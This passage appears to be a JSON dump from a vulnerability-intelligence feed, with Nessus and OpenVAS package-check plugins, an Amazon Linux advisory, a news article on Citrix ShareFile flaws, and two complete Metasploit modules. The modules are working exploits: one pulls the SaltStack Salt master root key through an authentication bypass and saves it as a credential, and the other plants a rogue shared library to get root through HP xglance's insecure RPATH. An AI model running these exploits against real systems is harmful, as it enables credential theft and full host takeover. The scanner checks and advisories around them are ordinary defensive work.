3.0.2.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"edk2-aarch64-2.8.0-4\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"edk2\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T16:49:50", "bulletinFamily": "scanner", "description": "According to the version of the perl-Data-Dumper package installed,\nthe EulerOS Virtualization for ARM 64 installation on the remote host\nis affected by the following vulnerability :\n\n - The Dumper method in Data::Dumper before 2.154, as used\n in Perl 5.20.1 and earlier, allows context-dependent\n attackers to cause a denial of service (stack\n consumption and crash) via an Array-Reference with many\n nested Array-References, which triggers a large number\n of recursive calls to the DD_dump\n function.(CVE-2014-4330)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-05-01T00:00:00", "id": "EULEROS_SA-2020-1553.NASL", "href": "https://www.tenable.com/plugins/nessus/136256", "published": "2020-05-01T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.2.0 : perl-Data-Dumper (EulerOS-SA-2020-1553)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136256);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/07\");\n\n script_cve_id(\n \"CVE-2014-4330\"\n );\n script_bugtraq_id(\n 70142\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.2.0 : perl-Data-Dumper (EulerOS-SA-2020-1553)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the perl-Data-Dumper package installed,\nthe EulerOS Virtualization for ARM 64 installation on the remote host\nis affected by the following vulnerability :\n\n - The Dumper method in Data::Dumper before 2.154, as used\n in Perl 5.20.1 and earlier, allows context-dependent\n attackers to cause a denial of service (stack\n consumption and crash) via an Array-Reference with many\n nested Array-References, which triggers a large number\n of recursive calls to the DD_dump\n function.(CVE-2014-4330)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1553\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?02f4b6e9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected perl-Data-Dumper package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-Data-Dumper\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"perl-Data-Dumper-2.145-3.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl-Data-Dumper\");\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "amazon": [{"lastseen": "2020-05-14T21:07:35", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nBuffer overflow in the XML parser in Mozilla Firefox before 38.0, Firefox ESR 31.x before 31.7, and Thunderbird before 31.7 allows remote attackers to execute arbitrary code by providing a large amount of compressed XML data, a related issue to [CVE-2015-1283 __](<https://access.redhat.com/security/cve/CVE-2015-1283>). ([CVE-2015-2716 __](<https://access.redhat.com/security/cve/CVE-2015-2716>))\n\n \n**Affected Packages:** \n\n\nexpat\n\n \n**Issue Correction:** \nRun _yum update expat_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n expat-2.1.0-11.22.amzn1.i686 \n expat-devel-2.1.0-11.22.amzn1.i686 \n expat-debuginfo-2.1.0-11.22.amzn1.i686 \n \n src: \n expat-2.1.0-11.22.amzn1.src \n \n x86_64: \n expat-debuginfo-2.1.0-11.22.amzn1.x86_64 \n expat-devel-2.1.0-11.22.amzn1.x86_64 \n expat-2.1.0-11.22.amzn1.x86_64 \n \n \n", "modified": "2020-05-14T02:27:00", "published": "2020-05-14T02:27:00", "id": "ALAS-2020-1364", "href": "https://alas.aws.amazon.com/ALAS-2020-1364.html", "title": "Medium: expat", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-05-25T11:58:34", "bulletinFamily": "exploit", "description": "This module exploits unauthenticated access to the _prep_auth_info() method in the SaltStack Salt master's ZeroMQ request server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the root key used to authenticate administrative commands to the master. VMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are known to be affected by the Salt vulnerabilities. Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker image.\n", "modified": "2020-05-09T22:30:49", "published": "2020-05-06T09:45:56", "id": "MSF:AUXILIARY/GATHER/SALTSTACK_SALT_ROOT_KEY", "href": "", "type": "metasploit", "title": "SaltStack Salt Master Server Root Key Disclosure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::ZeroMQ\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SaltStack Salt Master Server Root Key Disclosure',\n 'Description' => %q{\n This module exploits unauthenticated access to the _prep_auth_info()\n method in the SaltStack Salt master's ZeroMQ request server, for\n versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the\n root key used to authenticate administrative commands to the master.\n\n VMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are\n known to be affected by the Salt vulnerabilities.\n\n Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as\n well as Vulhub's Docker image.\n },\n 'Author' => [\n 'F-Secure', # Discovery\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-11651'], # Auth bypass (used by this module)\n ['CVE', '2020-11652'], # Authed directory traversals (not used here)\n ['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'],\n ['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'],\n ['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py']\n ],\n 'DisclosureDate' => '2020-04-30', # F-Secure advisory\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Dump', 'Description' => 'Dump root key from Salt master']\n ],\n 'DefaultAction' => 'Dump',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n Opt::RPORT(4506)\n ])\n end\n\n def run\n # These are from Msf::Exploit::Remote::ZeroMQ\n zmq_connect\n zmq_negotiate\n\n unless (root_key = extract_root_key(yeet_prep_auth_info))\n print_error('Could not find root key in serialized auth info')\n\n # Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce\n return Exploit::CheckCode::Safe\n end\n\n print_good(\"Root key: #{root_key}\")\n\n # I hate this API, but store the root key in creds, too\n create_credential_and_login(\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n address: rhost,\n port: rport,\n protocol: 'tcp',\n service_name: 'salt/zeromq',\n username: 'root',\n private_data: root_key,\n private_type: :password\n )\n\n # Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce\n Exploit::CheckCode::Vulnerable(root_key) # And the root key as the reason!\n rescue EOFError, Rex::ConnectionError => e\n print_error(\"#{e.class}: #{e.message}\")\n ensure\n # This is from Msf::Exploit::Remote::ZeroMQ\n zmq_disconnect\n end\n\n def yeet_prep_auth_info\n print_status(\"Yeeting _prep_auth_info() at #{peer}\")\n\n zmq_send_message(serialize_clear_load('cmd' => '_prep_auth_info'))\n\n unless (res = sock.get_once)\n fail_with(Failure::Unknown, 'Did not receive auth info')\n end\n\n unless res.match(/user.+UserAuthenticationError.+root/m)\n fail_with(Failure::UnexpectedReply,\n \"Did not receive serialized auth info: #{res.inspect}\")\n end\n\n vprint_good('Received serialized auth info')\n\n # HACK: Strip assumed ZeroMQ header and leave assumed MessagePack \"load\"\n res[4..-1]\n end\n\n def extract_root_key(auth_info)\n # Fetch root key from appropriate index of deserialized data, presumably\n MessagePack.unpack(auth_info)[2]&.fetch('root')\n rescue EOFError, KeyError, MessagePack::MalformedFormatError => e\n print_error(\"#{__method__} failed: #{e.message}\")\n nil\n end\n\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/saltstack_salt_root_key.rb"}], "thn": [{"lastseen": "2020-05-05T21:38:40", "bulletinFamily": "info", "description": "[](<https://thehackernews.com/images/-rHY5q681uo4/XrF299RyrnI/AAAAAAAA2vA/FOu7LoBCTF4TMJQGtp_MmgjccY8DP33uACLcBGAsYHQ/s728-e100/citrix-sharefile-vulnerability.jpg>)\n\nSince the past few weeks, software giant Citrix has privately been rolling out a critical software update to its enterprise customers that patches multiple security vulnerabilities affecting Citrix ShareFile content collaboration platform. \n \nThe security advisory\u2014about which The Hacker News learned from [Dimitri van de Giessen](<https://twitter.com/DimitriNL>), an ethical hacker and system engineer\u2014is scheduled to be available publicly later today on the [Citrix website](<https://support.citrix.com/article/CTX269106>). \n \nCitrix ShareFile is an enterprise-level file sharing solution for businesses using which employees can securely exchange proprietary and sensitive business data with each other. \n\n\n \nThe software offers an on-premises secure cloud environment for data storage with auditing capabilities and regulatory compliance controls. For example, a company can remotely lock or wipe data from potentially compromised mobile devices, or they're when lost or stolen. \n \nThe newly identified security issues (**CTX-CVE-2020-7473**) specifically affect customer-managed on-premises Citrix ShareFile storage zone controllers, a component that stores corporate data behind the firewall. \n \nThe list of vulnerabilities are: \n \n \n\n\n * CVE-2020-7473\n * CVE-2020-8982\n * CVE-2020-8983\n \n \n\n\n[](<https://thehackernews.com/images/-a4QlYJXh07Q/XrFxqV3hxNI/AAAAAAAA2uo/efArqRCyuuUX-dvErFscm6o1MTWmwbEMgCLcBGAsYHQ/s728-e100/citrix-sharefile-vulnerability.jpg>)\n\n \nAccording to the advisory, if exploited, the vulnerabilities could allow an unauthenticated attacker to compromise the storage zones controller potentially and access sensitive ShareFile documents and folders. \n \n\n\n## List of Affected and Patched Citrix ShareFile Versions\n\n \nIf your company uses on-premises ShareFile storage zones controller versions 5.9.0 / 5.8.0 /5.7.0/ 5.6.0 / 5.5.0 and earlier, you are affected and recommended to immediately upgrade your platform to Storage zones controller 5.10.0 / 5.9.1 / 5.8.1 or later. \n \nIt is important to note that if your storage zone was created on any of the affected versions, merely upgrading your software to a patched version would not completely resolve the vulnerability. \n\n\n \nTo fix this, the company has separately released a mitigation tool that you need to be run on your primary Storage zones controller first and then on any secondary controllers. \n \n\"Once the tool runs successfully on your primary zone, you MUST NOT revert any changes to it. Reverting changes will cause your zone to become unavailable,\" the advisory warned. \n \nYou can find a complete step by step details in the advisory, as soon as it becomes available publicly. \n \n\n\n[](<https://thehackernews.com/images/-yLGwc1sHZZY/XrFyQzIga-I/AAAAAAAA2u0/DnbkaOAXQA8S0AymXiocOzdV_jaV1HsqwCLcBGAsYHQ/s728-e100/citrix-software-vulnerability.jpg>)\n\n \nBesides the on-premises solution, the cloud versions of ShareFile storage zone controllers were also affected, but the company has already patched them and doesn't require any further action from users. \n \n\n\n## Where the Flaw Resides?\n\n \nAt the time of writing, though not much technical details on the underlying vulnerabilities are available, an initial patch inspection by Dimitri reveals that at least one of the flaws could have resided in an old ASP.net Toolkit that Citrix Sharefile used. \n \nThe 9-year-old outdated version of AjaxControlToolkit that's allegedly bundled with the affected versions of ShareFile software contains directory traversal and remote code execution vulnerabilities ([CVE-2015-4670](<https://www.cardinaleconcepts.com/cve-2015-4670-directory-traversal-to-remote-code-execution-in-ajaxcontroltoolkit/>)), which were disclosed publicly in 2015. \n \n\n\n[](<https://thehackernews.com/images/-lG8ThZL_3PU/XrFwoG1sGPI/AAAAAAAA2ug/GZ34rHtfoOAfRCxRdrmu3uO7pQxJxCNIQCLcBGAsYHQ/s728-e100/citrix-sharefile-vulnerability.jpg>)\n\n \nTo check if Citrix ShareFile implementation is affected or not, one can visit the following URL in the browser, and if the page returns blank, it's vulnerable, and if it through 404 error, it's either not flawed or has already been patched. \n \n\n\n> https://yoursharefileserver.companyname.com/UploadTest.aspx\n\n \nAccording to Dimitri, the mitigation tool makes some changes to the web.config file and then also deletes UploadTest.aspx and XmlFeed.aspx from the affected servers. \n\n\nHave something to say about this article? Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/thehackernews/>).\n", "modified": "2020-05-05T16:14:59", "published": "2020-05-05T14:00:00", "id": "THN:9F1824BD0EEB6A1695B53AE380D04BF9", "href": "https://thehackernews.com/2020/05/citrix-sharefile-vulnerability.html", "type": "thn", "title": "Warning: Citrix ShareFile Flaw Could Let Attackers Steal Corporate Secrets", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-05-06T09:22:41", "bulletinFamily": "exploit", "description": "", "modified": "2020-05-04T00:00:00", "published": "2020-05-04T00:00:00", "id": "PACKETSTORM:157528", "href": "https://packetstormsecurity.com/files/157528/HP-Performance-Monitoring-xglance-Privilege-Escalation.html", "title": "HP Performance Monitoring xglance Privilege Escalation", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GreatRanking \n \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \ninclude Msf::Post::Linux::Compile \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'HP Performance Monitoring xglance Priv Esc', \n'Description' => %q{ \nThis exploit takes advantage of xglance-bin, part of \nHP's Glance (or Performance Monitoring) version 11 'and subsequent' \n, which was compiled with an insecure RPATH option. The RPATH includes \na relative path to -L/lib64/ which can be controlled by a user. \nCreating libraries in this location will result in an \nescalation of privileges to root. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'h00die', # msf module \n'Tim Brown', # original finding \n'Robert Jaroszuk', # exploit \n'Marco Ortisi', # exploit \n], \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'Linux x86', { 'Arch' => ARCH_X86 } ], \n[ 'Linux x64', { 'Arch' => ARCH_X64 } ] \n], \n'Privileged' => true, \n'References' => \n[ \n[ 'EDB', '48000' ], \n[ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/55' ], # permissions, original finding \n[ 'URL', 'https://www.redtimmy.com/linux-hacking/perf-exploiter/' ], # exploit \n[ 'URL', 'https://github.com/redtimmy/perf-exploiter' ], \n[ 'PACKETSTORM', '156206' ], \n[ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2630/' ], \n[ 'CVE', '2014-2630' ] \n], \n'DisclosureDate' => 'Nov 19 2014', \n'DefaultTarget' => 0 \n) \n) \nregister_options [ \nOptString.new('GLANCE_PATH', [ true, 'Path to xglance-bin', '/opt/perf/bin/xglance-bin' ]) \n] \nregister_advanced_options [ \nOptBool.new('ForceExploit', [ false, 'Override check result', false ]), \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) \n] \n \nend \n \n# Simplify pulling the writable directory variable \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef exploit_folder \n\"#{base_dir}/-L/lib64/\" \nend \n \ndef glance_path \ndatastore['GLANCE_PATH'].to_s \nend \n \n# Pull the exploit binary or file (.c typically) from our system \ndef exploit_data(file) \n::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-2630', file) \nend \n \ndef find_libs \nlibs = cmd_exec \"ldd #{glance_path} | grep libX\" \n%r{(?<lib>libX.+\\.so\\.\\d) => -L/lib64} =~ libs \nreturn nil if lib.nil? \n \nlib \nend \n \ndef check \nunless setuid? glance_path \nvprint_error \"#{glance_path} not found on system\" \nreturn CheckCode::Safe \nend \nlib = find_libs \nif lib.nil? \nvprint_error 'Patched xglance-bin, not linked to -L/lib64/' \nreturn CheckCode::Safe \nend \nvprint_good \"xglance-bin found, and linked to vulnerable relative path -L/lib64/ through #{lib}\" \nCheckCode::Appears \nend \n \ndef exploit \nunless check == CheckCode::Appears \nunless datastore['ForceExploit'] \nfail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' \nend \nprint_warning 'Target does not appear to be vulnerable' \nend \n \nif is_root? \nunless datastore['ForceExploit'] \nfail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override' \nend \nend \n \nunless writable? base_dir \nfail_with Failure::BadConfig, \"#{base_dir} is not writable\" \nend \n \n# delete exploit folder in case a previous attempt failed \nvprint_status(\"Deleting exploit folder: #{base_dir}/-L\") \nrm_cmd = \"rm -rf \\\"#{base_dir}/-L\\\"\" \ncmd_exec(rm_cmd) \n# make folder \nvprint_status(\"Creating exploit folder: #{exploit_folder}\") \ncmd_exec \"mkdir -p #{exploit_folder}\" \nregister_dir_for_cleanup \"#{base_dir}/-L\" \n \n# drop our .so on the system that calls our payload \n# we need gcc to compile instead of metasm since metasm \n# removes unused variables, which we need to keep xglance-bin \n# from breaking and not launching our exploit \nso_file = \"#{exploit_folder}libXm.so.3\" \nif live_compile? \nvprint_status 'Live compiling exploit on system...' \npayload_path = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\" \ncode = exploit_data('CVE-2014-2630.c') \ncode.sub!('#{payload_path}', payload_path) # inject our payload path \nupload_and_compile so_file, code, '-fPIC -shared -static-libgcc' \nrm_f \"#{so_file}.c\" \nelse \npayload_path = '/tmp/.u4aLoiq' \nvprint_status 'Dropping pre-compiled exploit on system...' \nupload_and_chmodx so_file, exploit_data('libXm.so.3') \nend \n \n# Upload payload executable \nvprint_status 'uploading payload' \nupload_and_chmodx payload_path, generate_payload_exe \n \n# link so files to exploit vuln \nlib = find_libs \n# just to be safe, Xt and Xp were in the original exploit \n# our mock binary is also exploitsable through libXmu.so.6 \n# unsure about the real binary \ncd exploit_folder \n['libXp.so.6', 'libXt.so.6', 'libXmu.so.6', lib].each do |l| \ncmd_exec \"ln -s libXm.so.3 #{l}\" \nend \n \n# Launch exploit \nprint_status 'Launching xglance-bin...' \ncd base_dir \noutput = cmd_exec glance_path \noutput.each_line { |line| vprint_status line.chomp } \nprint_warning(\"Manual cleanup of #{exploit_folder} may be required\") \nend \nend \n`\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/157528/hp_xglance_priv_esc.rb.txt"}], "openvas": [{"lastseen": "2020-05-06T01:15:52", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2020-05-01T00:00:00", "published": "2020-05-01T00:00:00", "id": "OPENVAS:1361412562310892192", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892192", "title": "Debian LTS: Security Advisory for ruby2.1 (DLA-2192-1)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892192\");\n script_version(\"2020-05-01T03:00:18+0000\");\n script_cve_id(\"CVE-2013-0269\", \"CVE-2020-10663\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-01 03:00:18 +0000 (Fri, 01 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-01 03:00:18 +0000 (Fri, 01 May 2020)\");\n script_name(\"Debian LTS: Security Advisory for ruby2.1 (DLA-2192-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2020/04/msg00030.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-2192-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby2.1'\n package(s) announced via the DLA-2192-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.1 has an\nunsafe object creation vulnerability.\nThis is quite similar to CVE-2013-0269, but does not rely on poor\ngarbage-collection behavior within Ruby. Specifically, use of JSON\nparsing methods can lead to creation of a malicious object within\nthe interpreter, with adverse effects that are application-dependent.\");\n\n script_tag(name:\"affected\", value:\"'ruby2.1' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', this problem has been fixed in version\n2.1.5-2+deb8u10.\n\nWe recommend that you upgrade your ruby2.1 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libruby2.1\", ver:\"2.1.5-2+deb8u10\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1\", ver:\"2.1.5-2+deb8u10\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1-dev\", ver:\"2.1.5-2+deb8u10\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1-doc\", ver:\"2.1.5-2+deb8u10\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1-tcltk\", ver:\"2.1.5-2+deb8u10\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}